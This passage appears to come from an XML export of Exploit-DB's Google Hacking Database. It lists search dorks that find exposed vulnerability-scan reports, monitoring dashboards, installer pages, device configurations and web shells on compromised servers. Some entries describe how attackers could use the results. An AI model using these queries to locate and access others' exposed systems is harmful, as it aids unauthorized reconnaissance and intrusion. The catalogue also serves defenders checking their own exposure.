<link>https://www.exploit-db.com/ghdb/5595</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Dashboards&quot; AND inurl:&quot;/zabbix/zabbix.php?action=dashboard.list&quot;</shortDescription>
<textualDescription>This dork provide more specific result in google searching and possibly allow view dashboard with guest login.
</textualDescription>
<query>intitle:&quot;Dashboards&quot; AND inurl:&quot;/zabbix/zabbix.php?action=dashboard.list&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Dashboards&quot; AND inurl:&quot;/zabbix/zabbix.php?action=dashboard.list&quot;</querystring>
<edb></edb>
<date>2019-10-24</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>7243</id>
<link>https://www.exploit-db.com/ghdb/7243</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;jaeger UI&quot; inurl:trace</shortDescription>
<textualDescription># Google Dork: intitle:&quot;jaeger UI&quot; inurl:trace
# Date: 21/06/2021
# Network or Vulnerability Data
# Author: Mohammed*_*
</textualDescription>
<query>intitle:&quot;jaeger UI&quot; inurl:trace</query>
<querystring>https://www.google.com/search?q=intitle:&quot;jaeger UI&quot; inurl:trace</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>4861</id>
<link>https://www.exploit-db.com/ghdb/4861</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Malware Analysis Report&quot;</shortDescription>
<textualDescription>intitle:&quot;Malware Analysis Report&quot;
This dork show many report Malware Analysis of organization.
KhanhNNVN
</textualDescription>
<query>intitle:&quot;Malware Analysis Report&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Malware Analysis Report&quot;</querystring>
<edb></edb>
<date>2018-06-18</date>
<author>KhanhNNVN</author>
</entry>
<entry>
<id>335</id>
<link>https://www.exploit-db.com/ghdb/335</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Microsoft Site Server Analysis&quot;</shortDescription>
<textualDescription>Microsoft discontinued Site Server and Site Server Commerce Edition on June 1, 2001 with the increasing adoption of its successor, Microsoft Commerce Server 2000 Server and Microsoft Commerce Server 2002. There are still some installations online however. An attacker may use these reports to gather information about the directory structure and possibly identify script files.</textualDescription>
<query>intitle:&quot;Microsoft Site Server Analysis&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Microsoft+Site+Server+Analysis%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-07-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>142</id>
<link>https://www.exploit-db.com/ghdb/142</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Nessus Scan Report&quot; &quot;This file was generated by Nessus&quot;</shortDescription>
<textualDescription>This search yeids nessus scan reports. Even if some of the vulnerabilities have been fixed, we can still gather valuable information about the network/hosts. This also works with ISS and any other vulnerability scanner which produces reports in html or text format.</textualDescription>
<query>intitle:&quot;Nessus Scan Report&quot; &quot;This file was generated by Nessus&quot;</query>
<querystring>https://www.google.com/search?q=%0Aintitle%3A%22Nessus+Scan+Report%22+%22This+file+was+generated+by+Nessus%22+</querystring>
<edb></edb>
<date>2004-03-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>4438</id>
<link>https://www.exploit-db.com/ghdb/4438</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Nessus Scan Report&quot; ext:html</shortDescription>
<textualDescription>Finds reports left behind by Nessus (vulnerability scanner)
Dxtroyer</textualDescription>
<query>intitle:&quot;Nessus Scan Report&quot; ext:html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Nessus Scan Report&quot; ext:html</querystring>
<edb></edb>
<date>2017-04-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>5601</id>
<link>https://www.exploit-db.com/ghdb/5601</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;netdata dashboard&quot; AND intext:&quot;Costa Tsaousis&quot;</shortDescription>
<textualDescription># Dork #
intitle:&quot;netdata dashboard&quot; AND intext:&quot;Costa Tsaousis&quot;
This dork possibly allow to view dashboard.</textualDescription>
<query>intitle:&quot;netdata dashboard&quot; AND intext:&quot;Costa Tsaousis&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;netdata dashboard&quot; AND intext:&quot;Costa Tsaousis&quot;</querystring>
<edb></edb>
<date>2019-10-28</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>4683</id>
<link>https://www.exploit-db.com/ghdb/4683</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;netsparker scan report&quot; ext:pdf</shortDescription>
<textualDescription>intitle:&quot;netsparker scan report&quot; ext:pdf
Finds reports left behind by Netsparker (vulnerability scanner)
ManhNho
</textualDescription>
<query>intitle:&quot;netsparker scan report&quot; ext:pdf</query>
<querystring>https://www.google.com/search?q=intitle:&quot;netsparker scan report&quot; ext:pdf</querystring>
<edb></edb>
<date>2018-02-28</date>
<author>ManhNho</author>
</entry>
<entry>
<id>7288</id>
<link>https://www.exploit-db.com/ghdb/7288</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;NETSurveillance WEB&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;NETSurveillance WEB&quot;
# Network or Vulnerability Data
# Date:18/07/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;NETSurveillance WEB&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;NETSurveillance WEB&quot;</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6083</id>
<link>https://www.exploit-db.com/ghdb/6083</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Nikto Report&quot; &quot;OSVDB&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Nikto Report&quot; &quot;OSVDB&quot;
# Description: Find reports generated by the Nikto vulnerability scanner.
# Author: Carlos Ramírez L. (BillyV4)
</textualDescription>
<query>intitle:&quot;Nikto Report&quot; &quot;OSVDB&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Nikto Report&quot; &quot;OSVDB&quot;</querystring>
<edb></edb>
<date>2020-05-14</date>
<author>BillyV4</author>
</entry>
<entry>
<id>5468</id>
<link>https://www.exploit-db.com/ghdb/5468</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;OpenNMS web console&quot; inurl:opennms/index.jsp</shortDescription>
<textualDescription>OpenNMS network monitoring dashboard login pages
# Google Dork: intitle:&quot;OpenNMS web console&quot; inurl:opennms/index.jsp
# Date: [28-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:&quot;OpenNMS web console&quot; inurl:opennms/index.jsp</query>
<querystring>https://www.google.com/search?q=intitle:&quot;OpenNMS web console&quot; inurl:opennms/index.jsp</querystring>
<edb></edb>
<date>2019-08-28</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>800</id>
<link>https://www.exploit-db.com/ghdb/800</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;PHPBTTracker Statistics&quot; | intitle:&quot;PHPBT Tracker Statistics&quot;</shortDescription>
<textualDescription>This query shows pages which summarise activity on PHPBT-powered BitTorrent trackers - all the torrents currently being &quot;tracked&quot;.This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!Often, the URL involved can be changed to access the configuration / installation / deletion script.. which are obviously *not* intended for public access, even if the statistics page is.</textualDescription>
<query>intitle:&quot;PHPBTTracker Statistics&quot; | intitle:&quot;PHPBT Tracker Statistics&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22PHPBTTracker+Statistics%22+%7C+intitle%3A%22PHPBT+Tracker+Statistics%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-12-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1171</id>
<link>https://www.exploit-db.com/ghdb/1171</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Retina Report&quot; &quot;CONFIDENTIAL INFORMATION&quot;</shortDescription>
<textualDescription>This googledork finds vulnerability reports produced by eEye Retina Security Scanner. The information inside these reports can help an attacker break into a system/network.</textualDescription>
<query>intitle:&quot;Retina Report&quot; &quot;CONFIDENTIAL INFORMATION&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Retina+Report%22+%22CONFIDENTIAL+INFORMATION%22&amp;num=100&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>7029</id>
<link>https://www.exploit-db.com/ghdb/7029</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;routeros&quot; &quot;sophia&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;routeros&quot; &quot;sophia&quot;
# Date: 22/07/2021
# Exploit Author: Neha Singh</textualDescription>
<query>intitle:&quot;routeros&quot; &quot;sophia&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;routeros&quot; &quot;sophia&quot;</querystring>
<edb></edb>
<date>2021-07-22</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>6097</id>
<link>https://www.exploit-db.com/ghdb/6097</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Skipfish - scan results browser&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Skipfish - scan results browser&quot;
# Description: Find reports generated by Skipfish vulnerability scanner.
# Author: Carlos Ramírez L. (BillyV4)
</textualDescription>
<query>intitle:&quot;Skipfish - scan results browser&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Skipfish - scan results browser&quot;</querystring>
<edb></edb>
<date>2020-05-19</date>
<author>BillyV4</author>
</entry>
<entry>
<id>763</id>
<link>https://www.exploit-db.com/ghdb/763</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;start.managing.the.device&quot; remote pbx acc</shortDescription>
<textualDescription>MCK Communications, Inc.PBXgatewayIIHigh density central site gateway for remote PBX access(MCK Communications is now known as VESO.)</textualDescription>
<query>intitle:&quot;start.managing.the.device&quot; remote pbx acc</query>
<querystring>https://www.google.com/search?q=intitle%3A%22start.managing.the.device%22+remote+pbx+access+&amp;sourceid</querystring>
<edb></edb>
<date>2004-12-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4807</id>
<link>https://www.exploit-db.com/ghdb/4807</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;Statistics Report for HAProxy&quot; + &quot;statistics report for pid&quot;</shortDescription>
<textualDescription>intitle:&quot;Statistics Report for HAProxy&quot; + &quot;statistics report for pid&quot;
Statistics Report for HAProxy
ManhNho
</textualDescription>
<query>intitle:&quot;Statistics Report for HAProxy&quot; + &quot;statistics report for pid&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Statistics Report for HAProxy&quot; + &quot;statistics report for pid&quot;</querystring>
<edb></edb>
<date>2018-05-07</date>
<author>ManhNho</author>
</entry>
<entry>
<id>665</id>
<link>https://www.exploit-db.com/ghdb/665</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;sysinfo * &quot; intext:&quot;Generated by Sysinfo * written by The Gamblers.&quot;</shortDescription>
<textualDescription>Lots of information leakage on these pages about active network services, server info, network connections, etc..</textualDescription>
<query>intitle:&quot;sysinfo * &quot; intext:&quot;Generated by Sysinfo * written by The Gamblers.&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=++intitle%3A%22sysinfo+*+%22+intext%3A%22Generated+by+Sysinfo+*+written+by+The+Gamblers.%22+</querystring>
<edb></edb>
<date>2004-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>736</id>
<link>https://www.exploit-db.com/ghdb/736</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;twiki&quot; inurl:&quot;TWikiUsers&quot;</shortDescription>
<textualDescription>TWiki has many security problems, depeding on the version installed. TWiki, is a flexible, powerful, and easy to use enterprise collaboration platform. It is a structured Wiki, typically used to run a project development space, a document management system, a knowledge base, or any other groupware tool, on an intranet or on the internet. Web content can be created collaboratively by using just a browser. Developers can create new web applications based on a Plugin API.</textualDescription>
<query>intitle:&quot;twiki&quot; inurl:&quot;TWikiUsers&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22twiki%22+inurl%3A%22TWikiUsers%22</querystring>
<edb></edb>
<date>2004-12-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>7012</id>
<link>https://www.exploit-db.com/ghdb/7012</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:&quot;ZAP Scanning Report&quot; + &quot;Alert Detail&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ZAP Scanning Report&quot; + &quot;Alert Detail&quot;
# Network or Vulnerability data.
# Date: 1/07/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;ZAP Scanning Report&quot; + &quot;Alert Detail&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ZAP Scanning Report&quot; + &quot;Alert Detail&quot;</querystring>
<edb></edb>
<date>2021-07-02</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5808</id>
<link>https://www.exploit-db.com/ghdb/5808</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:Grapher AND inurl:sensorlist.htm</shortDescription>
<textualDescription># Dork #
intitle:Grapher AND inurl:sensorlist.htm
This dork possibly allow to view network status without authentication.
</textualDescription>
<query>intitle:Grapher AND inurl:sensorlist.htm</query>
<querystring>https://www.google.com/search?q=intitle:Grapher AND inurl:sensorlist.htm</querystring>
<edb></edb>
<date>2020-03-19</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>5415</id>
<link>https://www.exploit-db.com/ghdb/5415</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:Host Report inurl:ganglia</shortDescription>
<textualDescription>Ganglia Dashboard (monitoring tool for computing systems, clusters and
network)
# Google Dork: intitle:Host Report inurl:ganglia
# Date: [20-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:Host Report inurl:ganglia</query>
<querystring>https://www.google.com/search?q=intitle:Host Report inurl:ganglia</querystring>
<edb></edb>
<date>2019-08-20</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>5357</id>
<link>https://www.exploit-db.com/ghdb/5357</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:prometheus time series collection and processing server inurl:/alerts</shortDescription>
<textualDescription>Finding prometheus dashboards
Dorks:
intitle:prometheus time series collection and processing server inurl:/alerts
intitle:prometheus time series collection and processing server inurl:/targets
# Date: [14-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:prometheus time series collection and processing server inurl:/alerts</query>
<querystring>https://www.google.com/search?q=intitle:prometheus time series collection and processing server inurl:/alerts</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>1371</id>
<link>https://www.exploit-db.com/ghdb/1371</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:r57shell +uname -bbpress</shortDescription>
<textualDescription>compromised servers... a lot are dead links, but pages cached show interesting info, this is r57shell.php script by Rush Security Team</textualDescription>
<query>intitle:r57shell +uname -bbpress</query>
<querystring>https://www.google.com/search?q=intitle%3Ar57shell+%2Buname+-bbpress+-ihackstuff</querystring>
<edb></edb>
<date>2006-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5827</id>
<link>https://www.exploit-db.com/ghdb/5827</link>
<category>Network or Vulnerability Data</category>
<shortDescription>intitle:traefik inurl:8080/dashboard</shortDescription>
<textualDescription>Traefik Dashboard
# Google Dork: intitle:traefik inurl:8080/dashboard
# Date: [24-3-2020]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:traefik inurl:8080/dashboard</query>
<querystring>https://www.google.com/search?q=intitle:traefik inurl:8080/dashboard</querystring>
<edb></edb>
<date>2020-03-24</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>3947</id>
<link>https://www.exploit-db.com/ghdb/3947</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:&quot;/cacti/graph_view.php&quot; OR inurl:&quot;/cacti/graph.php?&quot;</shortDescription>
<textualDescription>Search the CACTI system of SNMP graphs
Daniel Maldonado
http://caceriadespammers.com.ar</textualDescription>
<query>inurl:&quot;/cacti/graph_view.php&quot; OR inurl:&quot;/cacti/graph.php?&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/cacti/graph_view.php&quot; OR inurl:&quot;/cacti/graph.php?&quot;</querystring>
<edb></edb>
<date>2014-04-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>496</id>
<link>https://www.exploit-db.com/ghdb/496</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:&quot;/catalog.nsf&quot; intitle:catalog</shortDescription>
<textualDescription>This will return servers which are running versions of Lotus Domino. The catalog.nsf is the servers DB catalog. It will list all the DB's on the server and sometimes some juicy info too. An attacker can back the url down to the &quot;/catalog.nsf&quot; part if needed.</textualDescription>
<query>inurl:&quot;/catalog.nsf&quot; intitle:catalog</query>
<querystring>https://www.google.com/search?q=inurl%3A%22%2Fcatalog%2Ensf%22+intitle%3Acatalog</querystring>
<edb></edb>
<date>2004-09-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3953</id>
<link>https://www.exploit-db.com/ghdb/3953</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:&quot;/munin/network-*.html&quot; OR inurl:&quot;/munin/apache-*.html&quot; OR inurl:&quot;/munin/disk-*.html&quot; OR inurl:&quot;/munin/system-*.html&quot; OR inurl:&quot;/munin/munin-*.html&quot; OR inurl:&quot;/munin/problems.html&quot;</shortDescription>
<textualDescription>Search the Munin monitoring graphs
Daniel Maldonado
http://caceriadespammers.blogspot.com.ar</textualDescription>
<query>inurl:&quot;/munin/network-*.html&quot; OR inurl:&quot;/munin/apache-*.html&quot; OR inurl:&quot;/munin/disk-*.html&quot; OR inurl:&quot;/munin/system-*.html&quot; OR inurl:&quot;/munin/munin-*.html&quot; OR inurl:&quot;/munin/problems.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/munin/network-*.html&quot; OR inurl:&quot;/munin/apache-*.html&quot; OR inurl:&quot;/munin/disk-*.html&quot; OR inurl:&quot;/munin/system-*.html&quot; OR inurl:&quot;/munin/munin-*.html&quot; OR inurl:&quot;/munin/problems.html&quot;</querystring>
<edb></edb>
<date>2014-06-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>5430</id>
<link>https://www.exploit-db.com/ghdb/5430</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:&quot;/Serviceability?adapter=device.statistics.configuration&quot;</shortDescription>
<textualDescription>Google Dork: inurl:&quot;/Serviceability?adapter=device.statistics.configuration&quot;
Category: Configuration File Exposure (OWASP TOP 10(2017) A3-Sensitive Data
Exposure)
Description: It exposes control panel configuration file which contains
whole network configuration and internal logs of CISCO IP phones.
Author Name: Harsha Deepa
</textualDescription>
<query>inurl:&quot;/Serviceability?adapter=device.statistics.configuration&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/Serviceability?adapter=device.statistics.configuration&quot;</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>Harsha Deepa</author>
</entry>
<entry>
<id>4321</id>
<link>https://www.exploit-db.com/ghdb/4321</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:&quot;/weathermap/weathermap-cacti-plugin.php&quot;</shortDescription>
<textualDescription>Map IT infrastructure through Weathermap Cacti plugin
Ing. Daniel Maldonado http://www.caceriadespammers.com.ar</textualDescription>
<query>inurl:&quot;/weathermap/weathermap-cacti-plugin.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/weathermap/weathermap-cacti-plugin.php&quot;</querystring>
<edb></edb>
<date>2016-08-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4828</id>
<link>https://www.exploit-db.com/ghdb/4828</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:&quot;AllItems.aspx?FolderCTID=&quot; &quot;firewall&quot; | &quot;proxy&quot; | &quot;configuration&quot; | &quot;account&quot;</shortDescription>
<textualDescription>IT infrastructure documents, device configuration and documentation and
other juicy info.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;AllItems.aspx?FolderCTID=&quot; &quot;firewall&quot; | &quot;proxy&quot; | &quot;configuration&quot; | &quot;account&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;AllItems.aspx?FolderCTID=&quot; &quot;firewall&quot; | &quot;proxy&quot; | &quot;configuration&quot; | &quot;account&quot;</querystring>
<edb></edb>
<date>2018-05-17</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>793</id>
<link>https://www.exploit-db.com/ghdb/793</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:&quot;install/install.php&quot;</shortDescription>
<textualDescription>This searches for the install.php file. Most results will be a Bulletin board like Phpbb etc.This will let an attacker install the forum again. There is an exploit available on the Net which lets you see DB info.</textualDescription>
<query>inurl:&quot;install/install.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22install%2Finstall.php%22</querystring>
<edb></edb>
<date>2004-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>534</id>
<link>https://www.exploit-db.com/ghdb/534</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:&quot;map.asp?&quot; intitle:&quot;WhatsUp Gold&quot;</shortDescription>
<textualDescription>&quot;WhatsUp Gold's new SNMP Viewer tool enables Area-Wide to easily track variables associated with any port on a network device. With a few simple clicks, a network engineer can select device ports, navigate trees, and graph variables in real time. For instance, Area-Wide can track bandwidth or CPU utilization on a router to aid in capacity and resource management.&quot;</textualDescription>
<query>inurl:&quot;map.asp?&quot; intitle:&quot;WhatsUp Gold&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22map.asp%3F%22+intitle:%22WhatsUp+Gold%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1273</id>
<link>https://www.exploit-db.com/ghdb/1273</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:&quot;NmConsole/Login.asp&quot; | intitle:&quot;Login - Ipswitch WhatsUp Professional 2005&quot; | intext:&quot;Ipswitch WhatsUp Professional 2005 (SP1)&quot; &quot;Ipswitch, Inc&quot;</shortDescription>
<textualDescription>Ipswitch Whats Up Monitoring 2005!This is a console for Network Monitoring, access beyond the portal will allow you to do various things, such as telnet to internal machines, reboot servers, gain server information such as IP address.If the Administrators have utilised WUG to its potential, they will have also made full Infrastructure MAPs available. Access beyond the portal is Gold Information, you would have access to information and services as if you were an Administrator.In addition, some of the links, allow you to go beyond the portal as a guest user, this still allows reconisance of various servers and details of them, including where they are located physically.For anybody that is interested, the Login Portal has a SQL based Backend.</textualDescription>
<query>inurl:&quot;NmConsole/Login.asp&quot; | intitle:&quot;Login - Ipswitch WhatsUp Professional 2005&quot; | intext:&quot;Ipswitch WhatsUp Professional 2005 (SP1)&quot; &quot;Ipswitch, Inc&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22NmConsole/Login.asp%22+%7C+intitle:%22Login+-+Ipswitch+WhatsUp+Professional+2005%22+%7C+intext:%22Ipswitch+WhatsUp+Professional+2005+(SP1)%22+%22Ipswitch,+Inc%22+copyright+log+in+User+Name+password+%22Knowledge+Bas</querystring>
<edb></edb>
<date>2006-03-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>747</id>
<link>https://www.exploit-db.com/ghdb/747</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:&quot;sitescope.html&quot; intitle:&quot;sitescope&quot; intext:&quot;refresh&quot; -demo</shortDescription>
<textualDescription>Mercury SiteScope designed to ensure the availability and performance of distributed IT infrastructures — e.g., servers, operating systems, network devices, network services, applications, and components. Some pages may be IP restricted.</textualDescription>
<query>inurl:&quot;sitescope.html&quot; intitle:&quot;sitescope&quot; intext:&quot;refresh&quot; -demo</query>
<querystring>https://www.google.com/search?q=inurl%3A%22sitescope.html%22+intitle%3A%22sitescope%22+intext%3A%22refresh%22+-demo&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-12-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>662</id>
<link>https://www.exploit-db.com/ghdb/662</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:/adm-cfgedit.php</shortDescription>
<textualDescription>PhotoPost Pro is photo gallery system. This dork finds its installation page.You can use this page to set all parameters of the system. The existing data is not shown :(</textualDescription>
<query>inurl:/adm-cfgedit.php</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fadm-cfgedit.php+&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2004-11-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>592</id>
<link>https://www.exploit-db.com/ghdb/592</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:/cgi-bin/finger? &quot;In real life&quot;</shortDescription>
<textualDescription>The finger command on unix displays information about the system users. This search displays pre-fingered users, so an attacker wouldn't even have to guess their accounts.</textualDescription>
<query>inurl:/cgi-bin/finger? &quot;In real life&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/cgi-bin/finger%3F+%22In+real+life%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>591</id>
<link>https://www.exploit-db.com/ghdb/591</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:/cgi-bin/finger? Enter (account|host|user|username)</shortDescription>
<textualDescription>The finger command on unix displays information about the system users. This search displays the webinterface for that command.</textualDescription>
<query>inurl:/cgi-bin/finger? Enter (account|host|user|username)</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fcgi-bin%2Ffinger%3F+Enter+%28account%7Chost%7Cuser%7Cusername%29+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>1322</id>
<link>https://www.exploit-db.com/ghdb/1322</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:/counter/index.php intitle:&quot;+PHPCounter 7.*&quot;</shortDescription>
<textualDescription>This is an online vulnerable web stat program called PHPCounter 7.http://www.clydebelt.org.uk/counter/help.html It has several public vulnerabilities in versions 7.1 and 7.2 that include cross site scripting and unauthorized information disclosure.</textualDescription>
<query>inurl:/counter/index.php intitle:&quot;+PHPCounter 7.*&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Fcounter%2Findex.php+intitle%3A%22%2BPHPCounter+7.*%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2006-04-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>4820</id>
<link>https://www.exploit-db.com/ghdb/4820</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:/munin/localdomain/localhost.localdomain/open_files.html</shortDescription>
<textualDescription>Search for the page that generated by Munin, this page will contains the
sensitive information on the systems &amp; application.
</textualDescription>
<query>inurl:/munin/localdomain/localhost.localdomain/open_files.html</query>
<querystring>https://www.google.com/search?q=inurl:/munin/localdomain/localhost.localdomain/open_files.html</querystring>
<edb></edb>
<date>2018-05-16</date>
<author>Sang Bui</author>
</entry>
<entry>
<id>5068</id>
<link>https://www.exploit-db.com/ghdb/5068</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:/scripts/wgate</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ SAP ITS System Information ++
inurl:/scripts/wgate
- Potential for RFC exploit to extra valuable data
- Potential theft of username and password
- Potential creation of SAP_ALL privilege users
- Potential vulnerable to RFC callback
- 1 Vulnerabillites on Exploit DB available for SAP its at the time of writing
- Source and explanation for the Exploit:
- https://securityaffairs.co/wordpress/71908/security/sap-configuration-flaw.html
- 386 results at the time of writing
DISCLAIMER:
(The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system)
Some of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing
</textualDescription>
<query>inurl:/scripts/wgate</query>
<querystring>https://www.google.com/search?q=inurl:/scripts/wgate</querystring>
<edb></edb>
<date>2019-01-09</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>1260</id>
<link>https://www.exploit-db.com/ghdb/1260</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:CrazyWWWBoard.cgi intext:&quot;detailed debugging information&quot;</shortDescription>
<textualDescription>gives tons of private forum configuration information.examples: Global variables installed, what groups the default user, guest and admin belong to, file paths, OS and appache versions, encypted admin password.Also Crazyboard has known vulnerabilities.</textualDescription>
<query>inurl:CrazyWWWBoard.cgi intext:&quot;detailed debugging information&quot;</query>
<querystring>https://www.google.com/search?q=inurl:CrazyWWWBoard.cgi+intext:%22detailed+debugging+information%22&amp;start=10&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4973</id>
<link>https://www.exploit-db.com/ghdb/4973</link>
<category>Network or Vulnerability Data</category>
<shortDescription>inurl:department intext:&quot;hardware inventory&quot; firewall router ext:(doc | pdf | xls| psw | ppt | pps | xml | txt | ps | rtf | odt | sxw )</shortDescription>
<textualDescription>Hardware information, mainly firewall and routers.
Change the words to fit your needs.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
